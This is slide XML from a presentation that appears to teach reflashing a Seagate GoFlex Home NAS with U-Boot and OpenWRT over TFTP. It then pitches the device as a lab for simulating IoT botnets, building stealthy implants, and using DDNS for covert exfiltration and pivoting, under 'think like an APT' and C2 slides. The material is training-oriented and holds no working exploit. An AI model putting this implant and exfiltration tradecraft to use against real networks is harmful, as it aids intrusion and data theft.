              <a:t> (your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GoFlexHome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ethaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (copy the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ethaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / mac address from your device)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GoFlexHome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>saveenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2091528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926C-312A-0291-3F66-1423361A9859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DO NOT REBOOT THE DEVICE DURING THIS OR RESET*. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D96B955-928E-D938-F86E-1EE02E242CB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="6413626" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download the TFTP file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x640000 u-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>boot.kwb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Erase the current </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> erase 0x0 0x100000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write the new U-Boot:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> write 0x640000 0x0 0x100000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reset the device:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>reset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{465F2322-914B-1488-4054-788556ABEC23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6761429" y="1944609"/>
            <a:ext cx="5334000" cy="3276600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E2476E0-AD8B-3C3A-1D11-BB33B05AE55C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7061703" y="5785164"/>
            <a:ext cx="4798337" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>*If you make a mistake, we will need to recover U-BOOT. It is not fatal.. But it isa good lesson in hardware recovery. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2905591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C409-87B7-9F9F-257D-D2DC949A0070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenWRT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E090CFB9-32AB-204E-353E-193609BC9319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="443620" y="1448554"/>
            <a:ext cx="6071480" cy="4728409"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Boot in U-Boot / break the bootloader.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set the following variables:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Setenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ipaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of device)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Setenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>serverip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Setenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ethaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (device MAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tftpboot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (name of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenWRT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>erase.part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ubi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nand write 0x800000 ubi 0x600000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>reset</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5FA0A61A-E328-A1DB-F326-5DC949D4A78F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3019896" y="6234283"/>
            <a:ext cx="2238375" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56CB9183-BFE0-62FE-CBE0-CBDE79B37B66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2764453" y="5530632"/>
            <a:ext cx="3078179" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember that screenshot? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You’ll need the MAC address:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C808F60C-448E-2DD8-DFEE-D7252A02FCFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7107912" y="128588"/>
            <a:ext cx="4838700" cy="3124200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED3EFBAD-32D1-1B32-08B5-DDCBD77D1203}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7107912" y="2900362"/>
            <a:ext cx="6315075" cy="3829050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2208961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B5AE-9A60-799A-D21A-E5B069D254A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenWRT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is installed! </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember to set your password on reboot.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62F028B5-5C40-D5BC-8E41-D770E755042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5923793-532A-F7A1-6E5F-A85EC62EB2DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="536039" y="1690688"/>
            <a:ext cx="6629400" cy="3667125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCC1D339-14B1-5515-F744-4EE086FF67DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7165439" y="4715839"/>
            <a:ext cx="4065760" cy="1391882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="656666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B646-064D-2F26-2FB6-AEEA9C8FA201}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OK, who cares? You installed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenWRT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>….</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C86F34A-D010-5B06-CE5D-CFE2F313ACE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="559165" y="1368311"/>
            <a:ext cx="5536836" cy="4808652"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You have an embedded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> system that you can stage as an embedded systems exploration and hardware hacking lab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You have the ability to simulate IoT botnets / cross load other operating systems and components.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You have the ability to customize implants focused on the same capabilities as most commercial implants for little to no money and higher storage / stealth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>You have the ability to use DDNS networks, self-registering services used by these devices for infiltration, exfiltration, pivoting, without arousing much suspicion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why does that matter? ADVANCED TRADECRAFT.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SOCKS Proxy SSH Tunnels on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>OpenWRT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> | Chris Swan's Weblog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>My Cloud Personal Storage Drive User Manual</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3A4F3DD-8464-CC19-16D0-84E63EB7DE7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1368311"/>
            <a:ext cx="3948062" cy="2219325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{394A3A05-431D-29EE-8E73-33CDFF42B3DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6766053" y="3478487"/>
            <a:ext cx="3932878" cy="3205162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="748586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D6C3D-901F-F34D-B774-CFCF92DECBFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>THINK LIKE AN APT. THINK LIKE YOUR ADVERSARIES.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0313CE11-8B1C-4688-0510-5256B6381A5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REAL TRADECRAFT, not just a snappy name: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get resourceful, pragmatic… USE WHAT IS AROUND YOU.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3197372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3C38-4D29-F196-77F9-2C050A1A526B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2 Frameworks &amp; Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A98491-D4A3-0EB4-28C2-C8529F853990}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
